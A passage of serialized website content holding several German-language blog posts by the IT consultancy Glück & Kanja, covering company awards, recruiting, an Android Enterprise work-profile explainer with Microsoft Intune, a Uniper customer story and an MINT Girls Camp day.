Cloud Security Operations Center bietet die ",[433,3865,3866],{},[374,3867,3869],{"href":3868},"/de/portfolio/cloud-security-operations-center/","komplette Überwachung von Sicherheitsvorfällen als Service"," und auch im Bereich ",[433,3872,3873],{},[374,3874,3876],{"href":2069,"rel":3875},[378],"Migration"," und Wireless LAN kommt die Cloud-Architektur aus Offenbach ohne traditionelle Komponenten aus.",[353,3879,3880,3881,3884],{},"“Es ist uns eine Ehre, Glück & Kanja als Gewinner des Microsoft Global Modern Desktop of the Year Award und des Microsoft Country Partner of the Year Award auszuzeichnen“ ",[433,3882,3883],{},"sagt Gavriella Schuster, Corporate Vice President, Microsoft Corp."," “Glück & Kanja hat mit bemerkenswerter Kompetenz und Innovationskraft Kunden geholfen, mehr zu erreichen.“",[353,3886,3887],{},"Der Microsoft Partner of the Year Award wird jährlich an Microsoft Partner vergeben, die sich deutlich mit innovativen und vor allem erfolgreichen Lösungen und Projekten bewiesen haben.",[2548,3889,3891],{"id":3890},"links","Links",[367,3893,3894,3900,3906,3913],{},[370,3895,3896],{},[374,3897,3899],{"href":3898},"/documents/press-releases/201906-gk-PressReleasePOYAward-DE.pdf","Pressemitteilung (deutsch)",[370,3901,3902],{},[374,3903,3905],{"href":3904},"/documents/press-releases/201906-gk-PressReleasePOYAward-EN.pdf","Press Release (englisch)",[370,3907,3908],{},[374,3909,3912],{"href":3910,"rel":3911},"https://partner.microsoft.com/de-DE/inspire/awards",[378],"Microsoft Inspire",[370,3914,3915],{},[374,3916,3919],{"href":3917,"rel":3918},"https://company-36087.frontify.com/d/rx2v6DVIyMGz/glueck-kanja-style-guide#/collaterals/microsoft-partner-of-the-year",[378],"Microsoft Logos",{"title":402,"searchDepth":403,"depth":403,"links":3921},[3922],{"id":3890,"depth":403,"text":3891},{"categories":3924,"blogtitlepic":3925,"thumb":3926,"socialimg":3927,"customExcerpt":3822},[410],"head-poy-2019","thumb-poy-2019","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/keyvisuals/kv-home-award-2019.jpg","2019-06-06","/posts/2019-06-06-gk-microsoft-partner-of-the-year",{"title":3815,"description":3822},"posts/2019-06-06-gk-microsoft-partner-of-the-year",[422,3933,3934,3935,420],"Award","Partner of the Year","Country Partner of the Year","Jwtf0d-MvXJ_yCiIfggfIZQrXBLXxeiF1hb3gUBjY78",{"id":3938,"title":3939,"author":191,"body":3940,"cta":3,"description":3997,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":3998,"moment":4004,"navigation":415,"path":4005,"seo":4006,"stem":4007,"tags":4008,"webcast":406,"__hash__":4010},"content_de/posts/2019-06-28-gk-top-100.md","Glück & Kanja Consulting gehört zu den TOP 100",{"type":350,"value":3941,"toc":3994},[3942,3949,3952,3958,3961,3972,3974],[353,3943,3944,3945,3948],{},"Zum 26. Mal kürt der Wettbewerb TOP 100 die innovativsten Unternehmen des deutschen Mittelstands. Zu diesen Innovationsführern zählt in diesem Jahr auch Glück & Kanja. Wissenschaftsjournalist und TV-Moderator Ranga Yogeshwar überreichte das ",[433,3946,3947],{},"Top 100-Siegel"," heute in der Frankfurter Jahrhunderthalle. In dem unabhängigen Auswahlverfahren konnte das Unternehmen besonders mit seinem Innovationserfolg überzeugen.",[353,3950,3951],{},"Durch den Abend mit hochrangigen Gästen wie Hessens Wirtschaftsminister Tarek Al-Wazir und dem ehemaligen Bundespräsidenten Christian Wulff führte die Journalistin und Tagesschau-Sprecherin Linda Zervakis. Der Preisverleihung vorausgegangen war ein strenges Auswahlverfahren, das die aktuellen Top-Innovatoren durchlaufen mussten. So prüften der Innovationsforscher Professor Dr. Nikolaus Franke und sein Team vom Institut für Entrepreneurship und Innovation der Wirtschaftsuniversität Wien die nominierten Unternehmen genauestens auf ihr professionelles Innovationsmanagement und den konkreten Innovationserfolg.",[353,3953,3954,3955,3957],{},"Wieder einmal konnte Glück & Kanja mit seiner Fokussierung auf ",[433,3956,2845],{}," überzeugen. Das IT-Unternehmen hat als einer der ersten deutschen Microsoft-Partner das Potenzial der Cloudtechnologie erkannt und sich damit ein komplett neues Geschäftsfeld erschlossen: Experten begleiten Großunternehmen auf dem Weg in die Cloud – von der Planung bis kompletten Deployment.",[353,3959,3960],{},"Vor fünf Jahren war das Thema Cloud für viele IT-Spezialisten kaum der Rede wert. Harald Glück und Christian Kanja hatten von der ersten Stunde an kaum Zweifel am weltweiten Siegeszug der Cloud-Technologie: Die Top-Innovatoren haben früh erkannt, dass deren Implementierung mittels einer Kombination aus den Strukturen von Microsoft und einer selbst entwickelten Software am besten funktioniert. „Wir liefern also quasi den erforderlichen Klebstoff mit“, sagt Harald Glück. Mit diesem innovativen Ansatz konnte das TOP 100-Unternehmen immer mehr Anwender davon überzeugen, ihre eigenen Server abzuschalten und stattdessen auf die Cloudlösungen von Microsoft zu setzen. „100 % Cloud“ lautet inzwischen der Slogan des Mittelständlers, der seit mehr als 20 Jahren durchgehend den höchsten Grad der Microsoft-Partnerzertifizierung hält.",[353,3962,3963,3966,3967,456],{},[433,3964,3965],{},"TOP 100: der Wettbewerb","\nSeit 1993 vergibt compamedia das TOP 100-Siegel für besondere Innovationskraft und überdurchschnittliche Innovationserfolge an mittelständische Unternehmen. Die wissenschaftliche Leitung liegt seit 2002 in den Händen von Prof. Dr. Nikolaus Franke. Franke ist Gründer und Vorstand des Instituts für Entrepreneurship und Innovation der Wirtschaftsuniversität Wien. Mentor von TOP 100 ist der Wissen-schaftsjournalist Ranga Yogeshwar. Projektpartner sind die Fraunhofer-Gesellschaft zur Förderung der angewandten Forschung und der BVMW. Als Medienpartner begleiten das manager magazin, impulse und W&V den Unternehmensvergleich. Mehr Infos unter ",[374,3968,3971],{"href":3969,"rel":3970},"https://www.top100.de/",[378],"www.top100.de",[2548,3973,3891],{"id":3890},[367,3975,3976,3982,3988],{},[370,3977,3978],{},[374,3979,3981],{"href":3980},"/documents/press-releases/201906-gk-PressReleaseTop100-DE.pdf","Glück & Kanja Pressemitteilung zur TOP 100-Runde 2019",[370,3983,3984],{},[374,3985,3987],{"href":3986},"/documents/press-releases/201906-gk-PressReleaseTop100Allgemein-DE.pdf","Allgemeine Pressemitteilung zur TOP 100-Runde 2019",[370,3989,3990],{},[374,3991,3947],{"href":3992,"rel":3993},"https://company-36087.frontify.com/d/rx2v6DVIyMGz/glueck-kanja-style-guide#/collaterals/top-100-wettbewerb",[378],{"title":402,"searchDepth":403,"depth":403,"links":3995},[3996],{"id":3890,"depth":403,"text":3891},"Zum 26. Mal kürt der Wettbewerb TOP 100 die innovativsten Unternehmen des deutschen Mittelstands. Zu diesen Innovationsführern zählt in diesem Jahr auch Glück & Kanja. Wissenschaftsjournalist und TV-Moderator Ranga Yogeshwar überreichte das Top 100-Siegel heute in der Frankfurter Jahrhunderthalle. In dem unabhängigen Auswahlverfahren konnte das Unternehmen besonders mit seinem Innovationserfolg überzeugen.",{"categories":3999,"blogtitlepic":4000,"thumb":4001,"socialimg":4002,"customExcerpt":4003},[410],"head-top100award","thumb-top100award","https://res.cloudinary.com/c4a8/image/upload/v1620723680/blog/heads/head-top100award.jpg","Die Glück & Kanja Consulting AG hat bei der 26. Ausgabe des Innovationswettbewerbs TOP 100 den Sprung unter die Besten geschafft.","2019-06-28","/posts/2019-06-28-gk-top-100",{"title":3939,"description":3997},"posts/2019-06-28-gk-top-100",[4009,3933],"Top 100","vLCVzZJ6aT9rhdc_9V95B_1bX24Tgo0VE859dSRODmM",{"id":4012,"title":4013,"author":144,"body":4014,"cta":3,"description":4085,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4086,"moment":4092,"navigation":415,"path":4093,"seo":4094,"stem":4095,"tags":4096,"webcast":406,"__hash__":4098},"content_de/posts/2019-07-16-new-employees.md","Sieben neue Mitarbeiter im ersten Halbjahr. Wir sagen Herzlich Willkommen",{"type":350,"value":4015,"toc":4083},[4016,4023,4046,4053,4059,4065,4073,4080],[353,4017,4018,4019,4022],{},"Mit dem Erfolg unserer 100% Cloud Strategie stehen wir vor der Herausforderung, unsere Teams auf gesunde Weise wachsen zu lassen. In der Vergangenheit war es für uns als IT-Beratungshaus nicht einfach, unser Unternehmen am Arbeitsmarkt bekannt zu machen. Viele Bewerber berichteten uns, dass sie eher durch Zufall auf Glück & Kanja gestoßen sind, da wir in der Vielzahl der Jobportale und Listen mit Stellenanzeigen oft nicht wahrgenommen wurden. Im Herbst 2018 starteten wir unsere ",[433,4020,4021],{},"„Lust auf Veränderung?“-Kampagne",". Als kleinen Teaser nannte ich meinen Job-Titel in XING genauso – was mir einige positive Reaktionen brachte.",[353,4024,4025,4026,4029,4030,2454,4035,993,4040,4045],{},"Worauf kam es uns an? Wir wussten, dass wir für Interessierte einiges zu bieten haben: sehr spannende und zukunftsorientiere Themen, eine attraktive Arbeitsatmosphäre mit tollen Menschen und eine lockere und wertschätzende Firmenkultur. Im ersten Schritt bereiteten wir daher Bilderwelten und Texte auf unserer Karriere-Seite so auf, dass diese Vorteile klar zur Geltung kamen. Des Weiteren entschieden wir uns dafür, unsere Profile bei XING und damit auch bei kununu aufzuhübschen, um ",[433,4027,4028],{},"ein aktives „Employer Branding“"," zu betreiben. Wir nutzten ergänzend die sozialen Netzwerke wie ",[374,4031,4034],{"href":4032,"rel":4033},"https://www.xing.com/company/glueckkanja",[378],"XING",[374,4036,4039],{"href":4037,"rel":4038},"https://www.linkedin.com/company/glueckkanja-gab",[378],"LinkedIn",[374,4041,4044],{"href":4042,"rel":4043},"https://twitter.com/glueckkanja",[378],"Twitter",", um die klassischen Stellenausschreibungen sichtbarer zu machen. Der erste Erfolg stellte sich schnell ein, zum Jahreswechsel 2018/19 gingen wöchentlich zahlreiche Bewerbungen ein.",[353,4047,4048,4049,4052],{},"In den darauffolgenden Gesprächen erhielten wir gutes Feedback zu unserer ",[433,4050,4051],{},"Unternehmensdarstellung auf kununu",", vor allem zu den Bewertungen. Um es gleich vorweg zu nehmen: Wir nehmen keinen Einfluss auf die Bewertungen! Allerdings stellen wir fest, dass kununu inzwischen gerne von Bewerbern genutzt wird, um sich ein besseres Bild darüber zu verschaffen, wie es hinter den Kulissen eines Unternehmens aussieht. Unsere neuen Mitarbeiter fragen wir daher, ob sie uns nach den ersten Monaten ihrer Eingewöhnung eine Bewertung geben. Zudem bitten wir auch Kandidaten, uns während des Bewerbungsverfahrens zu beurteilen.",[353,4054,4055],{},[356,4056],{"alt":4057,"src":4058},"Mitarbeiter in der Küche","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/collage-new-employees.jpg",[353,4060,4061,4064],{},[433,4062,4063],{},"Unser Bewerbungsverfahren"," ist seit vielen Jahren einfach und klar strukturiert: Nachdem ein erster Kontakt zustande gekommen ist, vereinbaren wir ein telefonisches Kennenlerngespräch von etwa einer Stunde. Dabei werden von beiden Seiten erste Fragen geklärt, und wir lernen uns näher kennen. Schon immer duzen wir uns bei Glück & Kanja, wie das auch zwischen Microsoft und seinen Partnern üblich ist. Es ist ein wichtiger Teil unserer Firmenkultur, und wir machen nur positive Erfahrungen damit. Nach dem Telefoninterview vereinbaren wir ein Gespräch in unserem Büro in Offenbach und entscheiden uns danach möglichst zeitnah. Es ist uns wichtig, dass alle Kandidaten wissen, was sie auf den einzelnen Stationen erwartet und welche Schritte bis zum konkreten Einstieg und während der Onboarding-Zeit folgen.",[353,4066,4067,4068,4072],{},"Es ist von außen oft schwierig, in ein Unternehmen zu schauen und abzuschätzen, ob es wirklich so gut ist, wie es scheint. Als hilfreich haben sich unsere zahlreichen Videos auf ",[374,4069,4071],{"href":697,"rel":4070},[378],"YouTube"," erwiesen. Seit 2016 lassen wir unsere Mitarbeiter im Format von Live-Webcasts über verschiedene Themen berichten. Über diese Clips können Interessenten Themen, Menschen und Kultur bei Glück & Kanja direkt kennenlernen. Darüberhinaus liefern wir ein konkretes Bild über die Themeninhalte, in denen sich Bewerber zukünftig bewegen werden. Wir laden natürlich auch neue Mitarbeiter ein, sich an der Erstellung von Blogs, Zeitschriftenartikeln und Webcasts zu beteiligen.",[353,4074,4075,4076,4079],{},"Das Onboarding beginnt im Regelfall bereits einen Monat vor dem eigentlichen Starttermin. Uns ist wichtig, dass neue „GKler\" vorab die Möglichkeit haben, uns etwas kennenzulernen und zu erfahren, mit welchen Themen wir uns beschäftigen. Allen neuen Mitarbeitern stehen dazu ",[433,4077,4078],{},"auch unsere Trainings zur Verfügung",". Einige nahmen bereits vor ihrem offiziellen Eintrittstermin an den Trainings teil. So konnte bereits frühzeitig der Kontakt zu Kollegen und Spezialisten-Teams hergestellt werden. Ein solches Engagement freut uns natürlich sehr.",[353,4081,4082],{},"Sieben neue Mitarbeiter in den letzten sechs Monaten – so schnell sind wir in so kurzer Zeit noch nie gewachsen! Glück & Kanja heißt alle neuen Kollegen herzlich willkommen. Es ist uns ein wichtiges Anliegen, dass sich unsere neuen Teammitglieder in unserem Unternehmen wohlfühlen und sich schnell und einfach zurechtfinden. Auch im zweiten Halbjahr möchten wir viele motivierte Menschen finden, die Lust haben, mit uns Cloud Lösungen zu gestalten. Sprecht uns an!",{"title":402,"searchDepth":403,"depth":403,"links":4084},[],"Mit dem Erfolg unserer 100% Cloud Strategie stehen wir vor der Herausforderung, unsere Teams auf gesunde Weise wachsen zu lassen. In der Vergangenheit war es für uns als IT-Beratungshaus nicht einfach, unser Unternehmen am Arbeitsmarkt bekannt zu machen. Viele Bewerber berichteten uns, dass sie eher durch Zufall auf Glück & Kanja gestoßen sind, da wir in der Vielzahl der Jobportale und Listen mit Stellenanzeigen oft nicht wahrgenommen wurden. Im Herbst 2018 starteten wir unsere „Lust auf Veränderung?“-Kampagne. Als kleinen Teaser nannte ich meinen Job-Titel in XING genauso – was mir einige positive Reaktionen brachte.",{"categories":4087,"blogtitlepic":4088,"thumb":4089,"socialimg":4090,"customExcerpt":4091},[410],"head-new-employees","thumb-new-employees","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-new-employees.jpg","Glück & Kanja steht vor der Herausforderung, die Spezialisten-Teams auf gesunde Weise wachsen zu lassen. Durch ein aktives Employer Branding haben wir es geschafft, aus der Masse herauszustechen und in der ersten Jahreshälfte sieben neuen Mitarbeiter zu rekrutieren.","2019-07-16","/posts/2019-07-16-new-employees",{"title":4013,"description":4085},"posts/2019-07-16-new-employees",[474,2540,4097],"Recruiting","1kLVQDbVuPWbEz-kgKu6UFSmWv_xCJoeRU79idyD6Tg",{"id":4100,"title":4101,"author":60,"body":4102,"cta":3,"description":4233,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4234,"moment":4240,"navigation":415,"path":4241,"seo":4242,"stem":4243,"tags":4244,"webcast":406,"__hash__":4246},"content_de/posts/2019-07-18-android-enterprise-work-profiles.md","Android Enterprise Work Profiles: Modern Desktop to Go",{"type":350,"value":4103,"toc":4227},[4104,4115,4130,4133,4153,4156,4162,4179,4189,4193,4197,4200,4204,4207,4212],[353,4105,4106,4107,4110,4111,4114],{},"Mobiles und flexibles Arbeiten – dieses Ziel verfolgen wir mit unserem ",[433,4108,4109],{},"100% Cloud-basierten Modern Desktop",". Warum nicht auch die Verwaltung der Mobilgeräte revolutionieren? Google bringt durch die Abkündigung der klassischen MDM-Verwaltung neues Leben in das Management von Android-Geräten. Wie genau sieht die Zukunft aus, und was hat es mit ",[433,4112,4113],{},"Android Enterprise"," auf sich? Wie unterstützt Microsoft Intune die Verwaltung von Android?",[353,4116,4117,4118,4121,4122,4125,4126,4129],{},"Schaut man in die Vergangenheit der Verwaltung von Android-Geräten, fallen einige wichtige Meilensteine auf: Bereits seit Android 2.2 (aus dem Jahre 2010) besteht die klassische ",[433,4119,4120],{},"Device Administration API",", auf die MDM-Systeme zugreifen können. Doch die Nutzungsgewohnheiten und Anforderungen der Unternehmen haben sich geändert. Als Beispiel ist hier die Notwendigkeit zur ",[433,4123,4124],{},"Separierung von Privat- und Unternehmensdaten"," zu nennen, da Geräte im Sinne von BYOD oft sowohl geschäftlich als auch privat verwendet werden dürfen. Google hat dies erkannt und bezeichnet den Verwaltungsansatz \"Device Admin\" mittlerweile als \"legacy\". Aus diesem Grund ist die neue Richtung klar: Android Enterprise löst die alte Welt ab. Seit Android 5.0 (2014) existieren neue Verwaltungsmöglichkeiten. Darunter fallen die sogenannten \"Work Profiles\" sowie \"Managed Devices\". Was einst unter dem alten Namen \"Android for Work\" eingeführt wurde, zählt nun zu \"Android Enterprise\". Wer in dieser Welt unterwegs ist, wird zudem mit großer Wahrscheinlichkeit auf das fast gleichlautende ",[433,4127,4128],{},"Android Enterprise Recommended-Programm"," stoßen. Dieses Validierungsprogramm hilft Unternehmen bei der Auswahl von Geräten, die von Google auf definierte Anforderungen getestet wurden. Google setzt der \"legacy\" Welt mittlerweile ein konkretes Ende: Seit Android 9.0 gilt \"Device Admin\" als \"depreacted\". Im Zuge der geplanten Veröffentlichung von Android 10.0 wird die API schließlich komplett entfernt.",[353,4131,4132],{},"Somit ist Handeln angesagt, denn Mobilgeräte bzw. MDM-Systeme müssen auf die \"neue\" Android-Verwaltung vorbereitet werden. Dabei stellt sich zunächst die Frage, welche Verwaltungsoption gewählt werden sollte. Microsoft Intune unterstützt drei Arten:",[367,4134,4135,4141,4147],{},[370,4136,4137,4140],{},[433,4138,4139],{},"Work Profiles",": Diese Art zielt auf persönliche Geräte (BYOD) ab, indem via MDM eine separate Arbeitsumgebung, getrennt von privaten Apps und Daten, eingerichtet wird.",[370,4142,4143,4146],{},[433,4144,4145],{},"Managed Devices",": Dieser Ansatz ist hauptsächlich für Geräte gedacht, die rein geschäftlich verwendet werden. Praktisch ein Work Profile, das sich über das gesamte Gerät erstreckt und somit keinen privaten Bereich zulässt.",[370,4148,4149,4152],{},[433,4150,4151],{},"Dedicated Devices",": Spezialgeräte (wie z.B. Kiosk-Geräte) ohne Nutzerzuordnung lassen sich über diesen Ansatz verwalten.",[353,4154,4155],{},"Spannend ist dabei vor allem der erste Ansatz, der die Trennung von privaten und geschäftlichen Daten zulässt. Im Zuge von BYOD suchen Unternehmen genau nach solchen Lösungen, um Geschäftsdaten auf Privatgeräten weiterhin unter Kontrolle zu behalten. Aber auch für firmeneigene Geräte ist dieser Ansatz denkbar. Ist es nicht ein Benefit, dem Mitarbeiter die persönliche Verwendung seines Firmengeräts zu erlauben?",[353,4157,4158],{},[356,4159],{"alt":4160,"src":4161},"Listen mit Apps","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/img-apps-androids.jpg",[353,4163,4164,4165,4167,4168,4171,4172,4175,4176,4178],{},"Wie sehen ",[433,4166,4139],{}," nun konkret in der Praxis aus? Startpunkt stellt, wie auch beim klassischen MDM, das \"Enrollment\" dar. Im Falle von Intune lädt der Nutzer das Unternehmensportal auf sein Gerät und meldet sich per Azure AD an. Mittels eines Assistenten wird er im Anschluss durch die Einrichtung und Aktivierung des Work Profiles geführt. Im Hintergrund legt Android die neue Partition an, welche auf Wunsch mit einem Zugang geschützt wird. Applikationen werden über den \"managed Google Play\" (abgekoppelt vom normalen Google Play) bereitgestellt. Das Unternehmen hat dabei die ",[433,4169,4170],{},"volle Kontrolle über verfügbare bzw. automatisch installierte Applikationen",". Je nach Launcher sieht der Anwender nach erfolgreicher Einrichtung eine Liste mit privaten und eine weitere Liste mit geschäftlichen Apps. Apps können dabei sogar doppelt installiert werden, wobei jeweils eine davon über ein Symbol als geschäftlich gekennzeichnet wird und im Container untergebracht ist. Eine besondere Lösung hat Android zudem für Kontakte parat: Geschäftskontakte sind zwar über die normale Telefon-App auffindbar und anwählbar, jedoch vom ",[433,4173,4174],{},"Zugriff durch private Apps geschützt",". Des Weiteren stehen die klassischen MDM-Funktionen wie zum Beispiel WLAN-, Zertifikatprofile und diverse vordefinierte Einstellungen bereit. Die Konformität eines Work Profile Devices kann, wie bei Windows 10 Geräten, anhand von Richtlinien ausgewertet und beispielsweise für ",[433,4177,3295],{}," zur gezielten Zugriffsteuerung verwendet werden.",[353,4180,4181,4182,4185,4186,456],{},"Zusammengefasst findet das Management eines Mobilgeräts mit Work Profile auf Profil-Ebene statt. Unternehmen verwalten somit den Container und nicht mehr das gesamte Gerät. Im Falle einer Fernlöschung wird nur die Arbeitspartition gelöscht – private Daten und Apps bleiben erhalten. Android Enterprise ermöglicht völlig neue Wege der Geräteverwaltung. Work Profiles bieten somit einen ",[433,4183,4184],{},"effektiven Schutz von Unternehmensdaten",", während die private Nutzung uneingeschränkt möglich bleibt. Und wie es sich für Glück & Kanja gehört – 100% Cloud verwaltet via Intune und somit eine Art ",[433,4187,4188],{},"Modern Desktop to go",[2548,4190,4192],{"id":4191},"last-but-not-least","Last but not least:",[629,4194,4196],{"id":4195},"sind-app-protection-policies-mam-durch-work-profiles-obsolet","Sind App Protection Policies (MAM) durch Work Profiles obsolet?",[353,4198,4199],{},"Definitiv nicht, denn sie können sogar in Kombination mit Work Profiles verwendet werden. So bleiben Microsoft 365 Daten sicher in den zugehörigen Apps aufbewahrt, während im Work Profile auch diverse andere Apps zur Verfügung gestellt werden können.",[629,4201,4203],{"id":4202},"gibt-es-bei-ios-auch-work-profiles","Gibt es bei iOS auch Work Profiles?",[353,4205,4206],{},"Da dieser Begriff von Google stammt, wird es ein gleichnamiges Feature mit hoher Wahrscheinlichkeit nicht geben. Doch mit der Ankündigung von iOS 13 geht Apple in dieselbe Richtung – wir bleiben gespannt, was im September kommt.",[4208,4209,4211],"h6",{"id":4210},"referenzen","Referenzen",[367,4213,4214,4221],{},[370,4215,4216],{},[374,4217,4220],{"href":4218,"rel":4219},"https://developers.google.com/android/work/device-admin-deprecation",[378],"Device admin deprecation",[370,4222,4223],{},[374,4224,3631],{"href":4225,"rel":4226},"https://www.glueckkanja.com/blog/scep/pki/ndes/wifi/radius/authentication/2019/04/scepman/",[378],{"title":402,"searchDepth":403,"depth":403,"links":4228},[4229],{"id":4191,"depth":403,"text":4192,"children":4230},[4231,4232],{"id":4195,"depth":704,"text":4196},{"id":4202,"depth":704,"text":4203},"Mobiles und flexibles Arbeiten – dieses Ziel verfolgen wir mit unserem 100% Cloud-basierten Modern Desktop. Warum nicht auch die Verwaltung der Mobilgeräte revolutionieren? Google bringt durch die Abkündigung der klassischen MDM-Verwaltung neues Leben in das Management von Android-Geräten. Wie genau sieht die Zukunft aus, und was hat es mit Android Enterprise auf sich? Wie unterstützt Microsoft Intune die Verwaltung von Android?",{"categories":4235,"blogtitlepic":4236,"thumb":4237,"socialimg":4238,"customExcerpt":4239},[534],"head-mobiles-arbeiten","thumb-mobiles-arbeiten","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-mobiles-arbeiten.jpg","Mobiles und flexibles Arbeiten – dieses Ziel verfolgen wir mit unserem 100% cloud-basierten Modern Desktop. Warum nicht auch die Verwaltung der Mobilgeräte revolutionieren? Google bringt durch die Abkündigung der klassischen MDM-Verwaltung neues Leben in das Management von Android-Geräten.","2019-07-18","/posts/2019-07-18-android-enterprise-work-profiles",{"title":4101,"description":4233},"posts/2019-07-18-android-enterprise-work-profiles",[534,2126,4245,420,2126],"Android","D23JNppDUQCoIG9PRcde6aJ5zXdPx-i1LDk5m6lPd-c",{"id":4248,"title":4249,"author":191,"body":4250,"cta":3,"description":4254,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4274,"moment":4279,"navigation":415,"path":4280,"seo":4281,"stem":4282,"tags":4283,"webcast":406,"__hash__":4287},"content_de/posts/2019-08-31-casestudy-uniper.md","Unipers einzigartige Reise zu 100% Cloud",{"type":350,"value":4251,"toc":4272},[4252,4255,4258,4261,4264],[353,4253,4254],{},"In der sich schnell verändernden Energiebranche wollte der Energiekonzern Uniper mehr operative Agilität ohne Abstriche bei Sicherheit und Stabilität. Mit der Einführung von Microsoft 365 hat Uniper seine Arbeitsplatzkultur verändert und die Zusammenarbeit und Sicherheit im gesamten Unternehmen verbessert, um so dazu beizutragen, die Bedürfnisse der europäischen Energiezukunft zu erfüllen.",[353,4256,4257],{},"Uniper ist ein internationales Energieunternehmen mit rund 11.000 Mitarbeitern. Es unterstützt die Energieumwandlung, indem es eine stabile Versorgung unabhängig von den Umweltbedingungen sicherstellt und dazu beiträgt, den Übergang von Kohlenstoff zu erneuerbaren Energien zu überbrücken. Es ist ein komplexer Mix aus Anforderungen, Änderungen und Herausforderungen, und Uniper begegnet ihnen mit Kreativität, Agilität, einer innovativen Denkweise und leistungsstarker Technologie.",[353,4259,4260],{},"\"Mit Kraftwerken mit einer Nettokapazität von rund 34 Gigawatt und Aktivitäten in mehr als 40 Ländern gehört Uniper zu den größten globalen Stromerzeugern, und wir setzen uns für eine stabile Energieversorgung und die Unterstützung der Energiewende ein\", sagt Hans Pezold, Senior Vice President of Information Technology bei Uniper. \"Um das zu erreichen, mussten wir effizienter werden und unser Geschäft digitalisieren.\"",[353,4262,4263],{},"In Zusammenarbeit mit Glück und Kanja hat Uniper eine komplette Microsoft 365-Lösung auf den Markt gebracht, die Office 365, Windows 10 und Enterprise Mobility + Security vereint, um eine effektivere, kollaborativere, sicherere und konsistentere Arbeitsumgebung zu schaffen.",[353,4265,4266,4267],{},"Die komplette Geschichte in Wort und Bild finden Sie ",[374,4268,4271],{"href":4269,"rel":4270},"https://customers.microsoft.com/en-us/story/748199-uniper-energy-microsoft365",[378],"hier!",{"title":402,"searchDepth":403,"depth":403,"links":4273},[],{"categories":4275,"blogtitlepic":4276,"thumb":4277,"socialimg":4278,"customExcerpt":4263},[410],"head-uniper-casestudy","thumb-uniper-casestudy","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-uniper-casestudy.jpg","2019-08-31","/posts/2019-08-31-casestudy-uniper",{"title":4249,"description":4254},"posts/2019-08-31-casestudy-uniper",[4284,420,422,4285,4286],"Casestudy","Customer","Success Story","zN3trXjFO7LXxWV6AMW52mLywYT4bbR9GfDiVv5nhMo",{"id":4289,"title":4290,"author":191,"body":4291,"cta":3,"description":4333,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":4334,"moment":4339,"navigation":415,"path":4340,"seo":4341,"stem":4342,"tags":4343,"webcast":406,"__hash__":4345},"content_de/posts/2019-10-08-mint-camp-at-gk.md","MINT Girls Camp Tag bei Glück & Kanja",{"type":350,"value":4292,"toc":4331},[4293,4300,4303,4313,4316,4323],[353,4294,4295,4296,4299],{},"In den Herbstferien abhängen und faulenzen? Nicht die 18 Teilnehmerinnen des diesjährigen ",[433,4297,4298],{},"MINT Girls Camp in Offenbach",". Stattdessen erleben sie zusammen mit Gleichaltrigen spannende Einblicke in interessante Berufe im Bereich Naturwissenschaften. Das Ziel: Mädchen für Berufe und Studienfächer zu begeistern, in denen bisher nur wenige Frauen arbeiten. Gestern verbrachten sie einen ganzen Tag bei Glück & Kanja und programmierten ein Grußkartenmodul auf einem Raspberry Pi.",[353,4301,4302],{},"Der Tag umfasste sowohl einen Theorie- als auch einen Praxisteil. Los ging es gleich morgens um 09.00 Uhr mit einer Führung durch unsere Büroräume und einer kleinen Vorstellungsrunde. Durch das Programm führten unsere beiden Auszubildenden Felix Schubert und Nikola Schubert. Sie erzählten, was ein Raspberry Pi ist, welche vielfältigen Anwendungsmöglichkeiten er bietet und vermittelten einen Überblick über HTML und CSS. Und natürlich bestand auch die Möglichkeit, jede Menge Fragen zu stellen.",[353,4304,4305,4308,4310],{},[356,4306],{"alt":4160,"src":4307},"https://res.cloudinary.com/c4a8/image/upload/v1570541906/blog/pics/2019-mint-girls-camp-teilnehmerinnen.jpg",[2970,4309],{},[748,4311,4312],{},"Teilnehmerinnen des diesjährigen MINT Girls Camp in Offenbach mit ihren Glück & Kanja Trainern",[353,4314,4315],{},"In der Mittagspause gab es Getränke und Pizza und danach ging es mit dem Praxisteil weiter. Gemeinsam bauten die Mädchen ihre Raspberry Pis zusammen und programmierten ihre eigene Website, um Grußkarten zu verschicken.",[353,4317,4318,4319,4322],{},"Das MINT Girls Camp in Offenbach wird durchgeführt vom Bildungsdienstleister ",[433,4320,4321],{},"Provadis und der Sportjugend Hessen",". Ziel des Camps ist es, an Naturwissenschaften, Informatik, Metall- und Elektrotechnik interessierte Mädchen zwischen 14 und 16 Jahren für MINT-Berufe zu begeistern und ihnen – neben einem attraktiven Freizeitprogramm – eine Möglichkeit der Berufsorientierung zu geben.",[353,4324,4325,4326,4330],{},"Wir hatten alle viel Spass und freuen uns auf das nächste Mal. Wer jetzt Lust hat, beim nächsten Mal auch dabei zu sein, kann sich unter ",[374,4327,4328],{"href":4328,"rel":4329},"http://www.mint-girls-camps.de",[378]," weitere Informationen holen.",{"title":402,"searchDepth":403,"depth":403,"links":4332},[],"In den Herbstferien abhängen und faulenzen? Nicht die 18 Teilnehmerinnen des diesjährigen MINT Girls Camp in Offenbach. Stattdessen erleben sie zusammen mit Gleichaltrigen spannende Einblicke in interessante Berufe im Bereich Naturwissenschaften. Das Ziel: Mädchen für Berufe und Studienfächer zu begeistern, in denen bisher nur wenige Frauen arbeiten. Gestern verbrachten sie einen ganzen Tag bei Glück & Kanja und programmierten ein Grußkartenmodul auf einem Raspberry Pi.",{"categories":4335,"blogtitlepic":4336,"socialimg":4337,"customExcerpt":4338},[410],"head-mint-girls-camp-2019","https://res.cloudinary.com/c4a8/image/upload/v1570602715/blog/heads/head-mint-girls-camp-2019.jpg","18 Schülerinnen aus Hessen haben gestern wieder am MINT Girls Camp bei Glück & Kanja teilgenommen mit dem Ziel, Mädchen für Berufe und Studienfächer zu begeistern, in denen bisher nur wenige Frauen arbeiten. Organisiert und durchgeführt wurde das Camp von 